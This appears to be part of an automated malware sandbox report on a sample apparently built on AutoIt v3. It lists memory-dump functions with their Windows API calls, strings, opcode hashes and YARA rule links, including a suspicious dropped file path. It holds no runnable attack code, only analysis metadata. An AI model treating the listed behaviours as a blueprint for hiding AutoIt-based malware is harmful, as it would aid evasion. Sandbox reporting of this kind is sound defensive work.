Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Peek$DispatchSleepTranslate
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
API String ID: 1762048999-758534266
Opcode ID: e3e3d4434eb89a2e2e0f35e325a8581bb32d09f61b0cdbce03a1b0f9461fcd46
Instruction ID: a7d5ea99d0d894b75aed098621f27eeb56873b25349c40936a85e38ee4b1138e
Opcode Fuzzy Hash: e3e3d4434eb89a2e2e0f35e325a8581bb32d09f61b0cdbce03a1b0f9461fcd46
Instruction Fuzzy Hash: 2C629D716083429BD724DF28C885BAAB7E4FB85304F144A1DF999C7252D7B4E889CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 0089AB4D, Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0089AC5C
RegCreateKeyExW.KERNELBASE(?,?,00000000,008B4E64,00000000,?,00000000,?,?,?), ref: 0089ACB6
RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0089AD00

Strings

REG_DWORD, xrefs: 0089AEE8
REG_BINARY, xrefs: 0089AF75
REG_MULTI_SZ, xrefs: 0089ADF6
REG_QWORD, xrefs: 0089AF2C
REG_SZ, xrefs: 0089AD83
REG_EXPAND_SZ, xrefs: 0089AD1B

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 3217815495-966354055
Opcode ID: dce9861a1792756b8b6661b676e4f5736e14b1c265c2328138c73338c00998e3
Instruction ID: 330a84b47e29b2a2264e7af27550a8f763d44a8cbf20a31eb8ed9e79b78d788f
Opcode Fuzzy Hash: dce9861a1792756b8b6661b676e4f5736e14b1c265c2328138c73338c00998e3
Instruction Fuzzy Hash: 7FE11E71604301ABDB14EF68D885F1AB7E8FF88704F188958F949DB246DB74E901CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0089ED23, Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON

Download Yara Rule

APIs

Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3

GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0089EE0E
GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0089F1FA
IsWindow.USER32(?), ref: 0089F22F
GetDesktopWindow.USER32 ref: 0089F2EB
EnumChildWindows.USER32 ref: 0089F2F2
EnumWindows.USER32(00891059,?), ref: 0089F2FA

Part of subcall function 008759E6: _wcslen.LIBCMT ref: 008759F6

Strings

ACTIVE, xrefs: 0089EED5
HANDLE, xrefs: 0089EEEF
INSTANCE, xrefs: 0089F0AC
REGEXPTITLE, xrefs: 0089EF09
REGEXPCLASS, xrefs: 0089EFA7
TITLE, xrefs: 0089F113
LAST, xrefs: 0089EEBB
CLASS, xrefs: 0089EF7A
ALL, xrefs: 0089F0DE

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 329138477-1919597938
Opcode ID: b6fbaa2ed603fc66b9d607f61cf7267762734fdc17ebbb72d36f7c3390d03b6d
Instruction ID: 190143686a730765abbf25e422bf43a607bb4b692a6193a5d821996e629fed8a
Opcode Fuzzy Hash: b6fbaa2ed603fc66b9d607f61cf7267762734fdc17ebbb72d36f7c3390d03b6d
Instruction Fuzzy Hash: 59F1C2724143419BCF04EF64D882AAAB7A4FF94314F08852DFA45DB256DB75E908CBE3

Uniqueness

Uniqueness Score: -1.00%

Function 0088CD0B, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0088CE26
__wsplitpath.LIBCMT ref: 0088CE65
_wcscat.LIBCMT ref: 0088CE78
_wcscat.LIBCMT ref: 0088CE8B
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CE9F
SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000104,?), ref: 0088CEB2

Part of subcall function 0086397D: GetFileAttributesW.KERNELBASE(?), ref: 00863984

GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CEF2
SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CF0A
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CF1B
SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CF2C
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CF40
_wcscpy.LIBCMT ref: 0088CF4E
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0088CF91

Strings

*.*, xrefs: 0088CF48

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
String ID: *.*
API String ID: 1153243558-438819550
Opcode ID: 13f1326941218093a30708c09f99d2adb2d5665e6245fb2fc65e6c9e777d7a17
Instruction ID: f6f73dec91d8b61f139bd55ac0a862ce0d3fce54ff304479970140ec441da142
Opcode Fuzzy Hash: 13f1326941218093a30708c09f99d2adb2d5665e6245fb2fc65e6c9e777d7a17
Instruction Fuzzy Hash: B371B3729002089BDF34FB58CC85AEDBBB4FF44300F1489AAE509E7255D6749EC4CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0083E560, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0083E5FF
__wsplitpath.LIBCMT ref: 0083E61C

Part of subcall function 0084392E: __wsplitpath_helper.LIBCMT ref: 00843970

_wcsncat.LIBCMT ref: 0083E633
__wmakepath.LIBCMT ref: 0083E64F

Part of subcall function 008439BE: __wmakepath_s.LIBCMT ref: 008439D4

Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571

_wcscpy.LIBCMT ref: 0083E687

Part of subcall function 0083E6C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0083E6A1), ref: 0083E6DD

_wcscat.LIBCMT ref: 00857324
_wcslen.LIBCMT ref: 00857334
_wcslen.LIBCMT ref: 00857345
_wcscat.LIBCMT ref: 0085735F
_wcsncpy.LIBCMT ref: 0085739F

Strings

Include, xrefs: 0083E62D
\, xrefs: 0085734D

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
String ID: Include$\
API String ID: 3173733714-3429789819
Opcode ID: ea54815285f0011ffe1ed36c62fd80c291c41f80d777fb5e8ab527b3fb0cf00d
Instruction ID: 0f85f458ae4ae0498d8da9bb1a1a2bcba25f40677d39a0defcd3e53a65622501
Opcode Fuzzy Hash: ea54815285f0011ffe1ed36c62fd80c291c41f80d777fb5e8ab527b3fb0cf00d
Instruction Fuzzy Hash: A151B4B14153059BCB10EF69EC869A677E4FB89300F404A1EF9D9D32A1F7749648CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008404E0, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00840513
RegisterClassExW.USER32 ref: 0084053D
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0084054E
InitCommonControlsEx.COMCTL32(008D90E8), ref: 0084056B
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0084057B
LoadIconW.USER32 ref: 00840592
ImageList_ReplaceIcon.COMCTL32(011DC840,000000FF,00000000), ref: 008405A2

Strings

+, xrefs: 008404FC
AutoIt v3 GUI, xrefs: 0084052F
0, xrefs: 008404F5
TaskbarCreated, xrefs: 00840543

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 44a080e96473bf3e695a4c8e925b5e60a0a6c7e33b207ab195b2666051ff6006
Instruction ID: 367e28498991d129e8f293df07600c7885847c768a06babeaf89653df8045573
Opcode Fuzzy Hash: 44a080e96473bf3e695a4c8e925b5e60a0a6c7e33b207ab195b2666051ff6006
Instruction Fuzzy Hash: 6B21F7B0905218EFDB10DFA4E889ADDBBB4FB18720F10831AF614A6390D7B44544CF94

Uniqueness

Uniqueness Score: -1.00%

Function 008403E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 008403EB
LoadCursorW.USER32(00000000,00007F00), ref: 008403FA
LoadIconW.USER32 ref: 00840410
LoadIconW.USER32 ref: 00840423
LoadIconW.USER32 ref: 00840436
LoadImageW.USER32 ref: 0084045E
RegisterClassExW.USER32 ref: 008404AD

Part of subcall function 008404E0: GetSysColorBrush.USER32(0000000F), ref: 00840513
Part of subcall function 008404E0: RegisterClassExW.USER32 ref: 0084053D
Part of subcall function 008404E0: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0084054E
Part of subcall function 008404E0: InitCommonControlsEx.COMCTL32(008D90E8), ref: 0084056B
Part of subcall function 008404E0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0084057B
Part of subcall function 008404E0: LoadIconW.USER32 ref: 00840592
Part of subcall function 008404E0: ImageList_ReplaceIcon.COMCTL32(011DC840,000000FF,00000000), ref: 008405A2

Strings

0, xrefs: 0084047C
#, xrefs: 00840483
AutoIt v3, xrefs: 00840499

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 025a0b47e319db9b87820ff7df496cdf4a02854451ca5e9a6462d8b8a53f1440
Instruction ID: 268a892bbe13cc380a543b04d14671c5897cd4d339bdc11d6a76125d5656a31a
Opcode Fuzzy Hash: 025a0b47e319db9b87820ff7df496cdf4a02854451ca5e9a6462d8b8a53f1440
Instruction Fuzzy Hash: A221FFB1D05318ABD720DFA9EC45F9A7BB5FB4C704F00425AE608E7291EBB55500CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0083A9D0, Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON

Download Yara Rule

Strings

Default, xrefs: 0085B2A4

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc
String ID: Default
API String ID: 1579825452-753088835
Opcode ID: 9e630942868e9ed8897d7a8d09e017b9b4983f3050cc2459eea827dcc353d0cf
Instruction ID: f2f32650b6e1588ae0a314cfff805059919cd4bc8c39fb07a85cb5879f395475
Opcode Fuzzy Hash: 9e630942868e9ed8897d7a8d09e017b9b4983f3050cc2459eea827dcc353d0cf
Instruction Fuzzy Hash: CD7269B0604305CFC728DF28C485A2AB7E5FF99315F248969E986CB352D735E849CB93

Uniqueness

Uniqueness Score: -1.00%

Function 0083FE90, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 0083FED3
_memmove.LIBCMT ref: 0083FEE2
__fread_nolock.LIBCMT ref: 0083FF02
_fseek.LIBCMT ref: 0083FF58

Strings

AU3!, xrefs: 0083FECD
EA06, xrefs: 00855CB6

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __fread_nolock_fseek_memmove_strcat
String ID: AU3!$EA06
API String ID: 1268643489-2658333250
Opcode ID: de76278e0dd356dcbdeaadef03a4817623e958728bad35c9d9936481bbeeb3ca
Instruction ID: 955ab2167f64b70cabe861cab0ac0cc0bf43fe29c4cfd681ca0065f004b6bb3a
Opcode Fuzzy Hash: de76278e0dd356dcbdeaadef03a4817623e958728bad35c9d9936481bbeeb3ca
Instruction Fuzzy Hash: 68410972E0414C9BCB11DB688891FFD3B64FB4A304F6844B9EA55CB243EE70A9458BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00831340, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129timewindowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00831376
KillTimer.USER32(?,00000001), ref: 008313F9

Part of subcall function 00831240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0083129B

PostQuitMessage.USER32(00000000,?,00000001), ref: 0083140B

Strings

TaskbarCreated, xrefs: 0083142B

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow
String ID: TaskbarCreated
API String ID: 3067442764-2362178303
Opcode ID: 0d4b25787a48725a8c152dc2f47c028a777d628e2240d59e14d415e4ca7b88fa
Instruction ID: d6c833a5ffe95f104404645ac21f0ef88ca3d79db3922f9cedbf0efbd15f883c
Opcode Fuzzy Hash: 0d4b25787a48725a8c152dc2f47c028a777d628e2240d59e14d415e4ca7b88fa
Instruction Fuzzy Hash: 1341E172608208DBDF24DB58ECCAFAA7369F790B21F004616F915C7791CAB8984087E7

Uniqueness

Uniqueness Score: -1.00%

Function 008635B2, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00863229: _wcsncpy.LIBCMT ref: 00863241

_wcslen.LIBCMT ref: 008635D7
GetFileAttributesW.KERNELBASE(?), ref: 00863601
GetLastError.KERNEL32 ref: 00863610
CreateDirectoryW.KERNELBASE(?,00000000), ref: 00863624
_wcsrchr.LIBCMT ref: 0086364B

Part of subcall function 008635B2: CreateDirectoryW.KERNEL32(?,00000000), ref: 0086368C

Strings

\, xrefs: 008635E3

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
String ID: \
API String ID: 321622961-2967466578
Opcode ID: ca4fbbc394b06143d0b6c2ca068dd7a91c769b0373c1818619582300a30f168e
Instruction ID: 6c766ac058c4ad0b4f36c45f213546d1822f5500741f2898d57d92940c7b5a6d
Opcode Fuzzy Hash: ca4fbbc394b06143d0b6c2ca068dd7a91c769b0373c1818619582300a30f168e
Instruction Fuzzy Hash: FC212B729013186ADF20AB78EC0ABEA336CFF12310F014795FD19D3141EB719B949AE2

Uniqueness

Uniqueness Score: -1.00%

Function 00897377, Relevance: 12.3, APIs: 8, Instructions: 267COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00897405

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

_memmove.LIBCMT ref: 00897466
_memmove.LIBCMT ref: 00897497
_memmove.LIBCMT ref: 008974F3
_memmove.LIBCMT ref: 00897585
_memmove.LIBCMT ref: 008975AC

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$_malloc
String ID:
API String ID: 1938898002-0
Opcode ID: a10198c5ad6de5bc9d3b88872ab7add69ea62b26a0da27a258af81c6084987bf
Instruction ID: 89d2e0afe4ed5aeac38e011a4adc3ea93f88c5fdb363daa8c30269b7e0f65531
Opcode Fuzzy Hash: a10198c5ad6de5bc9d3b88872ab7add69ea62b26a0da27a258af81c6084987bf
Instruction Fuzzy Hash: EE818172A142595BCB01FFA8DC42AEF7368FF84304F090665F914E7282DA35A91587E6

Uniqueness

Uniqueness Score: -1.00%

Function 0083E700, Relevance: 10.7, APIs: 7, Instructions: 157COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0083E72A

Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3

GetCurrentProcess.KERNEL32(?), ref: 0083E7D4
GetNativeSystemInfo.KERNELBASE(?), ref: 0083E832
FreeLibrary.KERNEL32(?), ref: 0083E842
FreeLibrary.KERNEL32(?), ref: 0083E854

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
String ID:
API String ID: 3363477735-0
Opcode ID: 32225b7fe723371e2325aaefc174d86035bbeee8e0abbfed95029043622b5c56
Instruction ID: e7c9d7df0e7f1004782c09344ad74421cca228460ffebef8aa5948f9979b8ecf
Opcode Fuzzy Hash: 32225b7fe723371e2325aaefc174d86035bbeee8e0abbfed95029043622b5c56
Instruction Fuzzy Hash: C761A170D0868AEECB10DFA8D88429DBFB4FF49304F14466AD444D3B41C375A998CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0083F3B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(0083F1FC), ref: 0083F3BD
SHGetDesktopFolder.SHELL32(?,008D90E8), ref: 0083F3D2
_wcsncpy.LIBCMT ref: 0083F3ED
SHGetPathFromIDListW.SHELL32(?,?), ref: 0083F427
_wcsncpy.LIBCMT ref: 0083F440

Strings

C:\Users\user\33920049\fmkkelc.omp, xrefs: 0083F3EB, 0083F43F, 00855D72, 00855D73

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsncpy$DesktopFolderFromListMallocPath
String ID: C:\Users\user\33920049\fmkkelc.omp
API String ID: 3170942423-3362734216
Opcode ID: 75a0c4743cc0ee80207272d949d8cdb4810a94dcaa5006660d6b16bdc60e8ad5
Instruction ID: 6a99bc99b8f65d3733d65d098acac26c87b4a9ee52b7cd1d0010d96bbfa127ec
Opcode Fuzzy Hash: 75a0c4743cc0ee80207272d949d8cdb4810a94dcaa5006660d6b16bdc60e8ad5
Instruction Fuzzy Hash: 45216276A00619ABCB14DBA4DC84DEFB37DEF88700F108698F909D7211E630AE45DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00831490, Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00831E00: _wcsncpy.LIBCMT ref: 00831ED2
Part of subcall function 00831E00: _wcscpy.LIBCMT ref: 00831EF1
Part of subcall function 00831E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00831F03

KillTimer.USER32(?,?,?,?,?), ref: 00831513
SetTimer.USER32 ref: 00831522
Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00857BC8
Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00857C1C
Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00857C67

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
String ID:
API String ID: 3300667738-0
Opcode ID: dc43b5984c68850e0ff5dd9c07bbe610ea72ea33c5563b604149f7f1245da588
Instruction ID: 91969466d9b78974d48952be56896d176ad10c8279c3f2d4302059c98b3ced8e
Opcode Fuzzy Hash: dc43b5984c68850e0ff5dd9c07bbe610ea72ea33c5563b604149f7f1245da588
Instruction Fuzzy Hash: 50318170A08649BFEF26CB24DC99BE6FBBDFB86704F004195E58D96140C7705A848B92

Uniqueness

Uniqueness Score: -1.00%

Function 0083E6C0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0083E6A1), ref: 0083E6DD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0083E6A1,00000000,?,?,?,0083E6A1), ref: 00857117
